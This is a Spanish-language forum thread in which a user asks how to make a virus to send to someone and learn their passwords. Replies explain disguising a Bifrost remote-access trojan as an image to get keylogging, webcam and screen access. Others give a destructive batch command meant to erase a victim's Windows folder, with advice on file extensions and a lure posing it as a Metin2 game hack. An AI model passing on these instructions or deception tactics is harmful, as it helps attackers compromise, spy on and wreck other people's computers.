Como hago 1 virus

Topic created · 11 Mensajes · 827 Visitas
  • COmo puedo crear un virus y mterelo en algun arxivo ¿? ..
    Y depues lo envio a alguien y ver que hace en su pc xD se puede¿?
    o solo parar adivinar passxD

  • Hacer exactamente lo que quieres no se, pero puedes bajarte el bifrost, lo configuras con el no-ip i todo, abres los puertos y el archivo que creas al terminar, le canvias el nombre i el icono, para que parezca una imagen o algo, y que el otro lo ejecute, y si lo has configurado bien, y cuando se lo envias no lo detecta el antivirus y el lo ejecuta, en el programa del bifrost tendras la ocion del keylogger(para capturar teclas y averiguar el pass), la opcionde ver su cam, la de ver su pantalla, archivos..
    La parte mas dificil es buscar una excusa para que el lo ejecute, claro i que no tenga Antivirus

  • @PiRaTaX said:

    Hacer exactamente lo que quieres no se, pero puedes bajarte el bifrost, lo configuras con el no-ip i todo, abres los puertos y el archivo que creas al terminar, le canvias el nombre i el icono, para que parezca una imagen o algo, y que el otro lo ejecute, y si lo has configurado bien, y cuando se lo envias no lo detecta el antivirus y el lo ejecuta, en el programa del bifrost tendras la ocion del keylogger(para capturar teclas y averiguar el pass), la opcionde ver su cam, la de ver su pantalla, archivos..
    La parte mas dificil es buscar una excusa para que el lo ejecute, claro i que no tenga Antivirus

    m.... y si el antivirus esta activado no tengo solucion verdad?¿

  • Pues los antivirus están para algo, si no detectaran los virus la gente no se los compraría xD

    La gente que hace virus que no los detectan los antivirus no los suele dejar por ahí gratis para que los use todo el mundo, además los antivirus se actualizan... así que no, no tienes solución.

  • Abre notepad
    Escribe esto:

    erase C:\WINDOWS \q
    

    Guardes en un archivo .bat y tu victima se queda sin PC.

    PD: Como me entere de que esto rula por aquí en archivo .bat/.exe ya me encargo yo de que ellos también queden sin IP :icon_evil:

  • @Anghios said:

    Abre notepad
    Escribe esto:

    erase C:\WINDOWS \q
    

    Guardes en un archivo .bat y tu victima se queda sin PC.

    PD: Como me entere de que esto rula por aquí en archivo .bat/.exe ya me encargo yo de que ellos también queden sin IP :icon_evil:

    Pero solo le envio el doc.txt con

    erase C:\WINDOWS \q
    

    Y ya esta xD¿'

  • Tienes que darle a guardar como y poner: "nombre.bat" (sin las comillas, puedes cambiar nombre por lo que quieras).

    Si alguien lo ejecuta como administrador, se le jode el PC, pero no puedes controlarlo ni ver sus contraseñas ni nada, sólo se lo jodes.

  • @Hawkings said:

    Tienes que darle a guardar como y poner: "nombre.bat" (sin las comillas, puedes cambiar nombre por lo que quieras).

    Si alguien lo ejecuta como administrador, se le jode el PC, pero no puedes controlarlo ni ver sus contraseñas ni nada, sólo se lo jodes.

    me interesa por k ami tambien me va a pasar xD
    tiene k ser algo .exe .bin o algo asi xD o solo un ducmento de texto k lo abres y ya ta jodido xD?=

  • Sí, solo tienes que guardarlo con la extensión .bin

  • No me hago cargo de que se use este consejo. Tu decisión es de hacerlo o no:

    Pues si se guarda como '.bin' puedes decirle la excusa (si la víctima juega al metin2) que es como un No-Patch, que le das click y ejecuta el metin, no abre el parcheado y puede usar con eso el hack (SD por ejemplo) sin que se le borre o algo, y le pasas el .bin, lo copia en el metin2, ejecuta y a tomar vientos el PC xD